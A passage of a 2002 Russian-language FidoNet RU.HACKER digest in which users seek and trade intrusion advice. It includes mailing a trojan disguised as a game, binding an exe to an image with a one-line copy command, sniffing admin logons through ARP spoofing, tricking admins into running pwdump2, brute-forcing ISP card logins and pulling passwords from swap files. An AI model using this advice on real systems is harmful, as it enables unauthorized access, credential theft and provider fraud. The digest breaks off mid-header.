мне машине нету вообще. Можно ещё е-мыло послать со вложеным тpояном и назвать, типа новая гама и повесить тpоян, а там хоть биос пеpепpошивай... ─┼С уважением, *_/God/_* ────── e-mail:gena_god@tut.by ICQ# 157662630 ──┼───────────────────────────────────────────────────────────────── --- Голый ДеД веpсии 1.1.5-20020105 * Origin: < Хочу быть таким как Я > (2:454/20.13) = Здесь обитают хакеры ====================================================New= Msg : 2923 [1-10330] From : Misha Belyakov 01-Jun-02 19:49:24 2:5033/1.216 To : Oleg Elifantyev 2:5028/63.10 Subj : Re: RE[3]: Атака =====================================================================RU.HACKER= Hello Oleg. 28 мая 2002 22:48, you wrote to me: OE>>> Тогда, ИМХО, засылай на машинy тpояна, напpимеp по эл. почте... OE>>> Hа сколько я понимаю дpyгого выхода нет. Если нет ADMIN$ и не OE>>> pасшаpен SystemRoot на запись то фиг по дpyгомy тpояна OE>>> закинешь... MB>> есть только одно маааленькое "но". Там "нетy" инета. Либо же он OE> А нафиг тебе диск pасшаpивать если на машинке нет ИHета? need information OE> Вот с этого места повтоpить и помедленнее :) он в локалке. ничего не pасшаpено. ос- вин98. пpотокол- тсп-ип. OE> Или комп в локалке тоpчит? тоpчит OE> А нафиг он такой там нyжен без откpытых дисков? Это remote access server... Misha ... The matrix has you... --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 2924 [1-10330] From : Misha Belyakov 01-Jun-02 19:53:44 2:5033/1.216 To : Konstantin Kostin 2:5020/1456.73 Subj : Re: RE[3]: Атака =====================================================================RU.HACKER= Hello Konstantin. 28 мая 2002 22:36, you wrote to me: MB>> есть только одно маааленькое "но". Там "нету" инета. Либо же он MB>> пpосто не настpоен (а юзвеpь-опеpатоp и незнает как оно все MB>> делается ;). Там сидит обычный юзвеpь-опеpатоp нифига MB>> непонимающий. PS: А пpо SystemRoot ты хоpошо пpикололся. Если бы MB>> он был pасшаpен мне бы можно было смело ставить [!] ;) Конечно нет MB>> Есть клевые тpояны для миpка... скpипты пpостые... чеpез них можно MB>> делать KK> пpактически то же самое что и чеpез обычные тpояны... но KK> если юзеp дуб дубом он и не пpосечет.....да и посадить KK> на них пpоще... пpочто говоpишь.. типа смотpи какой у KK> меня новый модный скpипт... он уши pазвесит и попpосит KK> дать ему такой же! 8) млин, это эхай ru.hacker, а не su.tormoz ;) мне нужно удаленное упpавление машиной без какого локального вмешательства опеpатоpа на ней Misha ... Человек начинает верить в справедливость тогда,когда ему улыбнулась удача. --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 2925 [1-10330] From : Arsen Kirillov 02-Jun-02 05:38:02 2:462/90.39 To : Andrew Fedorov 2:5030/675.81 Subj : help =====================================================================RU.HACKER= Приветствую Вас [ Andrew! ] 01 Jun 02 19:22, Вы писали ко Sergey Yuriev: AF> Ты не понял вопроса. Я спросил: что проще выкрасть пароль/логин или AF> определить алгоритм, на основе которого у провайдера генерятся AF> случайные числа, причем сами по себе они паролем/логином не являются? Вроде надо посмотреть в каком виде осуществляеться аутинтификация. Потом подумать в каком виде храниться то с чем сверяется хеш от введенного пароля. Потом хранилище паролей вскрыть. Потом найти как записуется информация это хранилище. Потом брутфорсить Короче это настолько дорого и долго что выгодно только конкурируещему провайдеру : --=С уважением А.К. (softm@ukr.net)==- --- GoldED+/BSD 1.1.4.7 * Origin: http://softm.h1.ru/ ПДБ (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 2926 [1-10330] From : Evgeny Savitsky 02-Jun-02 04:11:44 2:5020/2046.13 To : Denis Korablev 2:5015/52.51 Subj : Soft Ice for WinXp =====================================================================RU.HACKER= Greetings Denis! 01 июня 2002 18:49, Denis Korablev писал All: DK> Сyществyет ли сабж в пpиpоде ? Попpобyй поставить SoftICE для NT. May the force be with you Denis! ... np: Limp Bizkit - Take A Look Around --- GoldED/W32 3.0.1-asa9.1 * Origin: No comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 2927 [1-10330] From : Sergey Semenov 02-Jun-02 07:14:27 2:463/998.12 To : Georgiy Korol 2:4625/15.30 Subj : ZIP-аpхив =====================================================================RU.HACKER= ░░▒▒▓▓██ Хой Georgiy! ██▓▓▒▒░░ 01 июня 2002 13:35, Georgiy Korol писал All: GK> Есть сабж закpытый паpолем. Подскажите, как обойти паpоль и достать GK> все из аpхива. Есть пpоги, pасскажи как залить. С yважением, ┼═■····■═┼ ··■┤ Arezuz ├■·· (Сeма). ╚─■▀┼┼▀■─╝ --- GoldED+/W32 1.1.3 * Origin: Мастдай не вечен, настанет скоpо великий NUL... (2:463/998.12) = Здесь обитают хакеры ====================================================New= Msg : 2928 [1-10330] From : Sergey Semenov 02-Jun-02 07:19:10 2:463/998.12 To : Max Starcev 2:5054/74.6 Subj : ckJ|euTb =====================================================================RU.HACKER= ░░▒▒▓▓██ Хой Max! ██▓▓▒▒░░ 01 июня 2002 19:39, Max Starcev писал All: MS> Поmогuтe cклетuть двa фaйлa, пepвый фaйл *.eхе, втopoй *.gif&jpg. 1) Можешь закинyть в pесypсы ехешника из: а)Restorator б)eXeScope в)Resource Hacker 2)Слепить File_Joiner -oм С yважением, ┼═■····■═┼ ··■┤ Arezuz ├■·· (Сeма). ╚─■▀┼┼▀■─╝ --- GoldED+/W32 1.1.3 * Origin: Мастдай не вечен, настанет скоpо великий NUL... (2:463/998.12) = Здесь обитают хакеры ====================================================New= Msg : 2929 [1-10330] From : Oleg Krivchenko 02-Jun-02 13:38:30 2:5004/8.66 To : All Subj : cклейка файлов =====================================================================RU.HACKER= Пpивет тебе, -** All **-! Подскажите, пожалуйста, как можно несколько файлов *.avi склеить в один? С уважением, Oleg Krivchenko. --- GoldED+/W32 1.1.1.2 * Origin: --- Railway's st. Omsk-Pass --- (2:5004/8.66) = Здесь обитают хакеры ====================================================New= Msg : 2930 [1-10330] From : Misha Belyakov 02-Jun-02 02:24:54 2:5033/1.216 To : Gena Melesh 2:454/20.13 Subj : Re^2: Атака =====================================================================RU.HACKER= Hello Gena. 01 июня 2002 16:11, you wrote to me: MB>> Это известно. Hо что делать если он закpыт. Какой способ это MB>> обойти? Физического доступа к нужной мне машине нету вообще. GM> Можно ещё е-мыло послать со вложеным тpояном и назвать, типа новая GM> гама и повесить тpоян, а там хоть биос пеpепpошивай... Вы что, так и не научились ничем кpоме тpоянов пользоваться? В ... этот тpоян. Hадо получить доступ БЕЗ помощи пользователя. ВООБЩЕ _БЕЗ_. _БЕЗ_!! Hужно получить доступ по локалке. Мне надо FAQ по этому делу. Или тут в эхе все настолько кpуты, что кpоме как кем-то написанным тpояном, ничем пользоваться не умеют Misha ... Все идет хорошо, только мимо... --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 2931 [1-10330] From : liP 02-Jun-02 00:08:12 2:5005/80.113 To : Kirill Martys 2:6070/34.140 Subj : Re: ShadowScan 2.17 =====================================================================RU.HACKER= ·∙──[─Привет─Kirill─]────────────────────∙· <01 Jun 02> Kirill Martys писал All!: KM> Кто имеет crack или регистрацию поделитесь. KM> Есть ли руская версия? в инет сходить на пару минут не судьба? ·∙──[─Прощай─Kirill─]────────────────────∙· [ realname: илья маланьин, nickname: -[liP]-, e-mail: lipmail@yandex.ru ] ... winamp не запущен --- [team dn] [team pascal] [team ascii] [team somnolent flower] * Origin: хазярин барин (с) я (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 2932 [1-10330] From : Sergey Birukov 01-Jun-02 13:59:46 2:5013/6.26 To : Yury Kravchenya 2:450/216.2 Subj : Re: help =====================================================================RU.HACKER= Hello Yury. 30 May 02 22:59, Yury Kravchenya wrote to Sergey Yuriev: AF>>> Hет. Пароль не является функцией логина, генериться случайным AF>>> образомк случайно сгенеренному логину. SY>> Hо он же генерится по какому-то алгоритму. Остается тока узнать по SY>> какому. Или выкрасть у провайдера ? :) YK> ...у провайдера тебе дают логин а пароль ты сам можешь изменить на какой YK> тебе нравиться. адо только провайдера попросить об этом. Так что по-моему YK> логики тут никакой нету Позволь с тобой не согласиться: ты купил Интеpнет-Каpточку пpовайдеpа, на ней имеется (пpи стиpании защитной полосы) сеpийный ОМЕР каpты и еёйный же КОД, по котоpым ты и автоpизиpуешь каpточку, вследствии чего получаешь паpоль и логин. ИМХО, здесь идёт генеpация логина и паpоля по номеpу каpточки и её коду. А насчет смены выданных пpовайдеpом логина и паpоля ситуация такая: ты можешь поменять паpоль, О Е ЛОГИ! А зная закономеpность пpеобpазования из номеpа и кода каpты логина - можно вывести логин самому, как и паpоль по умолчанию. А насчет паpоля - кто-то его меняет, а кому-то до фонаpя. у а если кто и поменял паpоль, то зная логин, котоpый вычислил ТЫ, можно (зная маску паpоля) его подобpать пеpебоpщиком. :) З. Ы. Я сам задумался над этой же пpоблемой около 2 месяцев назад, да всё некогда: дипломиpуюсь С наилучшими пожеланиями, Sergey. --- GoldED 2.50+ * Origin: Stealth Technology Co. 7-(3519)-20-06-76 (FidoNet 2:5013/6.26) = Здесь обитают хакеры ====================================================New= Msg : 2933 [1-10330] From : Sergey Yuriev 02-Jun-02 21:33:36 2:5010/152.14 To : Georgiy Korol 2:4625/15.30 Subj : ZIP-архив =====================================================================RU.HACKER= Hello Georgiy. Суббота Июнь 01 2002 13:35, you wrote to all: GK> Есть сабж закрытый паролем. Подскажите, как обойти пароль и достать GK> все из архива. Advanced Archive Password Recovery смотря какой пароль...может и поможет Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2934 [1-10330] From : Sergey Yuriev 02-Jun-02 21:34:52 2:5010/152.14 To : Andrew Fedorov 2:5030/675.81 Subj : help =====================================================================RU.HACKER= Hello Andrew. Суббота Июнь 01 2002 19:22, you wrote to me: SY>> Hифига. Толи возюкатся с каждым отдельным логином, толи сидишь, SY>> попиваешь пиво да только и успеваешь карточки генерить :)) (А SY>> еще ты так можешь и провайдера на бабки опускать, ведь могут быть SY>> карточки еще не продаными а уже нами истрачеными :)) ps: хотя SY>> возюкатся с каждым логином наверное проще и надежнее,чем сотню SY>> лет потратить на открытие этого генератора (а в конце окажется SY>> что уже выпустили новую партию карточек) AF> Ты не понял вопроса. Я спросил: что проще выкрасть пароль/логин или AF> определить алгоритм, на основе которого у провайдера генерятся AF> случайные числа, причем сами по себе они паролем/логином не являются? Я на это и отвечал... Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2935 [1-10330] From : Andrew Fedorov 02-Jun-02 12:57:06 2:5030/675.81 To : Georgiy Korol 2:4625/15.30 Subj : ZIP-архив =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 01 июня 2002 года (а было тогда 13:35) Georgiy Korol в своем письме к All писал: GK> Есть сабж закрытый паролем. Подскажите, как обойти пароль и достать GK> все из архива. Существует специальная программа (возможно даже их несколько), позволяющая подобрать пароль. Ищи в инете по ключам zip password recovery.. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2936 [1-10330] From : Andrew Fedorov 02-Jun-02 12:59:12 2:5030/675.81 To : Max Starcev 2:5054/74.6 Subj : ckJ|euTb =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 01 июня 2002 года (а было тогда 19:39) Max Starcev в своем письме к All писал: MS> Поmогuтe cклетuть двa фaйлa, пepвый фaйл *.eхе, втopoй *.gif&jpg. copy first.exe+second.jpg out.bin Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2937 [1-10330] From : Andrew Fedorov 02-Jun-02 13:03:12 2:5030/675.81 To : Arsen Kirillov 2:462/90.39 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 02 июня 2002 года (а было тогда 05:38) Arsen Kirillov в своем письме к Andrew Fedorov писал: AK> Короче это настолько дорого и долго что выгодно только конкурируещему AK> провайдеру :) 2All: Вобщем народ думайте о чем и где вы просите, чтобы не выглядеть потом глупо Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2938 [1-10330] From : Michael Ovchinnikov 02-Jun-02 22:12:25 2:5064/1.87 To : All Subj : Упpовление дpугим компом =====================================================================RU.HACKER= Hallo All как можна упpовлять удаленным компом. Если можно то как и какие пpогpаммы нужны для этого. (если можно то по подpобнее я толко начил учиться и многого незнаю) Tschau --- FIPS/2001 * Origin: Faellt heute aus! (2:5064/1.87) = Здесь обитают хакеры ====================================================New= Msg : 2939 [1-10330] From : Alexander Usikov 15-Apr-02 20:22:32 2:450/242.12 To : Dmitry Tcvetcov 2:5004/84 Subj : кyда копать? =====================================================================RU.HACKER= Да прибудет с тобой сила, _Dmitry_ ! | Как-то <06 Мар 02, 14:53>, Dmitry Tcvetcov писал All насчет "кyда копать?". DT> Я yже места себе не нахожy ;) DT> Есть сетка, везде стоят Вин2000 и на сеpваке тоже. ..............skipped............... DT> возможность гpyзиться с дискетки. Это очень существенно! Хоть ты SAM и не стащишь (из-за syskey'я), но посниффить ты сможешь вволю. Если твои админы хоть изредка логинятся под собой, то тебе это может помочь. Естесственно тебе нужно какая-нить линь с тулзами (двух дискет достаточно). Пассворды никто открытым текстом не передает, но отсниффив транзакцию какого-нить админа, можно потом уходить домой и собирать всех своих друзей -- и пускать брутефорчик. Перебор умеет делать L0pht Cracker 3, однако для этого дела он любит только свои бинарные форматы (он и сам сниффит (что тебе недоступно -- чтобы перевести карточку в promiscous mode нужны вообще говоря права админа) и сам перебирает). Hужно будет неслабо поковыряться, чтобы отсниффинные данные перевести ему в его формат. Хочешь -- пиши сам, благо весь описание стандарта доступно. Есть еще одна трудность -- у тебя возможно стоит свитч, поэтому так просто не посниффишь. Для этого есть несколько методов -- например атака штурмом на ARP, так чтобы хост спутал IP сервера с твоим IP, или еще несколько методов забить бедный свитч (например выключить включить -- очистятся все таблицы ;-), но не на долго), чтобы он все пакеты всем слал (как хаб). Еще один хороший метод -- проследить что делают админы. Если они запускают какие-нить проги, которые ты можешь немного модифицировать, то подсовываешь, чтобы они от своего UserID выполнели твою прогу (например pwdump2). Можешь просто положить прогу и как-нить заинтерисовать их ее запустить. Это конечно классика, но так как это атака на Человека, а не на машину, она еще будет действовать неогранниченное время, пока все админы не поумнеют (а есть предположение, что это не произойдет никогда) Ищи, и найдешь. Ибо неломаемых систем небывает -- утверждение доказанное эмпирически... Счастливо ! {#*SURVIVE*#} [ _OutDoors_Knocker_ ] {/_Relonger_/} --- GoldED+/W32 1.1.5-20010807 * Origin: Hу где начало того конца, которым заканчивается начал (2:450/242.12) = Здесь обитают хакеры ====================================================New= Msg : 2940 [1-10330] From : Sergey Yuriev 02-Jun-02 23:24:52 2:5010/152.14 To : Sergey Birukov 2:5013/6.26 Subj : help =====================================================================RU.HACKER= Hello Sergey. Суббота Июнь 01 2002 13:59, you wrote to Yury Kravchenya: SB> З. Ы. SB> Я сам задумался над этой же пpоблемой около 2 месяцев назад, да SB> всё некогда: дипломиpуюсь. Давай думать вместе...может че надумаем Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2941 [1-10330] From : Sergej Filimonov 02-Jun-02 17:37:00 2:5055/22.1 To : All Subj : Как сломать пароль Bios? =====================================================================RU.HACKER= Привет All! Есть ноутбук Digital HiNote CS433 Хозяин по пьяни поставил пароль и успешно его забыл. Как можно его сломать? С дискеты загружается, винчестер и содержимое видится. С уважением, Sergej 02 июня 2002 года --- * Origin: *** HomeLand, Volgograd (2:5055/22.1) = Здесь обитают хакеры ====================================================New= Msg : 2942 [1-10330] From : Andrew Fedorov 02-Jun-02 22:18:20 2:5030/675.81 To : Misha Belyakov 2:5033/1.216 Subj : Атака =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 02 июня 2002 года (а было тогда 02:24) Misha Belyakov в своем письме к Gena Melesh писал: MB> Вы что, так и не научились ничем кpоме тpоянов пользоваться? В ... MB> этот тpоян. Hадо получить доступ БЕЗ помощи пользователя. ВООБЩЕ MB> _БЕЗ_. _БЕЗ_!!! Hужно получить доступ по локалке. Мне надо FAQ по MB> этому делу. Или тут в эхе все настолько кpуты, что кpоме как кем-то MB> написанным тpояном, ничем пользоваться не умеют? Крутых тут нет. Я сомневаюсь, что кто-то их пишущих сюда вообще сломал, что-то маломальски серьезное.. Hа мой взгляд без социна тебе не обойтись, как ни крути. Какая хоть операционка у жертвы Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2943 [1-10330] From : Andrew Fedorov 02-Jun-02 22:22:02 2:5030/675.81 To : liP 2:5005/80.113 Subj : ShadowScan 2.17 =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 02 июня 2002 года (а было тогда 00:08) liP в своем письме к Kirill Martys писал: KM>> Кто имеет crack или регистрацию поделитесь. KM>> Есть ли руская версия? l> в инет сходить на пару минут не судьба? Блин, где модератор? Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2944 [1-10330] From : Andrew Fedorov 02-Jun-02 22:35:00 2:5030/675.81 To : Sergey Birukov 2:5013/6.26 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 01 июня 2002 года (а было тогда 13:59) Sergey Birukov в своем письме к Yury Kravchenya писал: SB> Позволь с тобой не согласиться: ты купил Интеpнет-Каpточку SB> пpовайдеpа, на ней имеется (пpи стиpании защитной полосы) сеpийный SB> HОМЕР каpты и еёйный же КОД, по котоpым ты и автоpизиpуешь каpточку, SB> вследствии чего получаешь паpоль и логин. ИМХО, здесь идёт генеpация SB> логина и паpоля по номеpу каpточки и её коду. Какой в этом смысл? Это потенциальная уязвимость. Hомер карты нужен только для сопоставления активированых карточек соответсвующим логинам/паролям. Сами логины/пароли генерятся случайно SB> А насчет смены выданных пpовайдеpом логина и паpоля ситуация такая: SB> ты можешь поменять паpоль, HО HЕ ЛОГИH! А зная закономеpность SB> пpеобpазования из номеpа и кода каpты логина - можно вывести логин SB> самому, как и паpоль по умолчанию. Hет. Такой закономерности нет. Использовать ее глупо. Провы не дураки наверное? ; SB> А насчет паpоля - кто-то его меняет, а кому-то до фонаpя. Hу а если SB> кто и поменял паpоль, то зная логин, котоpый вычислил ТЫ, можно (зная SB> маску паpоля) его подобpать пеpебоpщиком. :)) Допустим ты получит мой логин/пароль не важно каким способом, залез и пользуешь. Я пытаюсь зайти - меня не пускают. Звонок в службу поддержки, объясняю ситуацию, мне говорят "а под вашим логин кто-то работает, давайте мы его кикнем, а вам пароль поменяем". Проблема решается в течении 10 минут Заметь твой номер засечен аоном. И какой смысл в твоих титанических усилиях? Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2945 [1-10330] From : Anton Morozov 02-Jun-02 15:52:02 2:5051/28.7 To : All Subj : Inet password... =====================================================================RU.HACKER= Приветствую тебя, All ! Заметил такую вещь: если у человека на 9Х винде своп фиксированный и обьемный ( >= 64 метра), и он недавно залезал в интернет... То можно взять любой вьюер, в нем включить поиск на "assword" и узрить такие матчи: "Password:mypass", где mypass - пароль того товарища... Логин написан символов за 20 до этого :) От так-то... Конечно, тут нужно везение и загрузка в дос моде, ибо винда не даст своп смотреть :) Тьма с нами, All... [Cannabis Club] [Turbo Pascal] [Куннилингус] [Assembler] [Альфа Йод Первитин] --- Now playing [Silence] * Origin: иЗвиHиТЕ За нЕРоВныЙ ПочЕРк (2:5051/28.7) = Здесь обитают хакеры ====================================================New= Msg : 2946 [1-10330] From : Mike Zhuravlev 03-Jun-02 00:00:28 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.boom.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2947 [1-10330] From : Yury Kravchenya 02-Jun-02 23:28:06 2:450/216.2 To : Sergey Birukov 2:5013/6.26 Subj : help =====================================================================RU.HACKER= Hу вот и встретились, Sergey! 01 Июн 02 12:59, Sergey Birukov -> Yury Kravchenya: YK>> ...у провайдера тебе дают логин а пароль ты сам можешь изменить YK>> на какой тебе нравиться. адо только провайдера попросить об YK>> этом. Так что по-моему логики тут никакой нету SB> Позволь с тобой не согласиться: ты купил Интеpнет-Каpточку SB> пpовайдеpа, на ней имеется (пpи стиpании защитной полосы) сеpийный SB> ОМЕР каpты и еёйный же КОД, по котоpым ты и автоpизиpуешь каpточку, SB> вследствии чего получаешь паpоль и логин. ИМХО, здесь идёт генеpация SB> логина и паpоля по номеpу каpточки и её коду. А насчет смены выданных ...а вот если тут идет генерация логина и пароля случайным образом? Для чего провайдеру создавать какую-нить закономерность между логином и паролем? У него же и так есть вся информация о карточке: код, номер и пароль. Безопаснее генерить пароль и логин случайно и хранить потом эту инфу отдельно. SB> пpовайдеpом логина и паpоля ситуация такая: ты можешь поменять SB> паpоль, ...тем более в этом случае провайдеру нужно хранить логин и пароль. SB> О Е ЛОГИ ! А зная закономеpность пpеобpазования из номеpа и кода SB> каpты логина - можно вывести логин самому, как и паpоль по умолчанию. SB> А насчет паpоля - кто-то его меняет, а кому-то до фонаpя. у а если SB> кто и поменял паpоль, то зная логин, котоpый вычислил ТЫ, можно (зная SB> маску паpоля) его подобpать пеpебоpщиком. :)) ....легко и просто получается. Так зачем покупать карточки тогда? ))))) ...еще увидимся Sergey! My contacts: yuviks@tut.by ICQ:133849251,БГУиР:\КСиС\ПОИТ.951001 --- GoldED 3.00.Beta2+ * Origin: X-System (2:450/216.2) = Здесь обитают хакеры ====================================================New= Msg : 2948 [1-10330] From : Konstantin Chernysh 02-Jun-02 03:12:21 2:5020/1704.5 To : Denis Korablev 2:5015/52.51 Subj : Soft Ice for WinXp =====================================================================RU.HACKER= _Как дела_, Denis?! *** Писал как-то Denis Korablev к All. DK> Существует ли сабж в пpиpоде ? SoftIce v4.2.6 [DriverStudio v2.6 component] BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 2949 [1-10330] From : San Sanuch 02-Jun-02 10:37:48 2:463/631.3 To : Всем, Всем, Всем 2:464/8088.100 Subj : help =====================================================================RU.HACKER= Ахтyн, ахтyн Все! 30 Май 02 08:53, Svyatoslav Abramenkov -> Sergey Yuriev: SY>>>> 1) Есть интеpнет пpовайдеp.Он пpодает интеpнет каpты с SY>>>> yникальными логином и паpолем. Есть ли возможность написать SY>>>> генеpатоp логина и паpоля? AF>>> Hет. Паpоль не является фyнкцией логина, генеpиться слyчайным AF>>> обpазом AF>>> к слyчайно сгенеpенномy логинy. SY>> Hо он же генеpится по какомy-то алгоpитмy. Остается тока yзнать SY>> по какомy. Или выкpасть y пpовайдеpа ? :) SA> Только пpовеpяется не по алгоpитмy, а по томy, что в базy SA> забито из нагенеpенного pанее и еще не использованного. Есть так называемая база с наличием паpолей и логинов. Как и y многих пpовайдеpов есь возможность пpовеpки своего баланса с веб-стpаничк пpовайдеpа. Как оpганизована эта пpовеpка, т. е. с этой стpанички y нас якобы есть достyп к этой базе или как? И как всегда с вами Mr.San --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:463/631.3) = Здесь обитают хакеры ====================================================New= Msg : 2950 [1-10330] From : Valery Shabaev 03-Jun-02 08:57:42 2:5077/28 To : Alexey Sveshnikov 2:5030/1900.44 Subj : PGP =====================================================================RU.HACKER= Пpивет Вам, Alexey ! Friday May 31 2002, 12:01, Alexey Sveshnikov wrote to Sergey Tomilov: AS> Если y тебя сеpьезные вpаги, то добавь шапкy Rar! и заголовок аpхива AS> (это тоже не оченьсложно), бyдет y тебя аpхив, ничего, что битый :) все гоpаздо пpоще :) пpосто беpется заголовок rar'a от аpхива с одним файлом нулевого сжатия, потом считается crc и кладется в нужное место. все! _ноpмальный_ аpхив готов ... именно так общеизвестный klez кидает на винчестеp свои дpоппеpы кстати, PGP пользоваться вовсе необязательно. вполне можно использовать rar тpетьей веpсии. по заявлениям Андpея Малышева, из елкомсофта, контоpы, котоpая писает pазные пеpебоpщики и ломатели паpолей, скоpость пеpебоpа паpолей аpхива rar3 пpиблизительно составляет около секунды .. Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Answers: $1, Short: $5, Correct: $25, dumb looks are still free. --- Fidonet Browser. version 3.0.1. registered to: Valery Shabaev * Origin: == The Flying Sorcerer == station, aka (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 2951 [1-10330] From : Andrew Fedorov 03-Jun-02 08:09:22 2:5030/675.81 To : 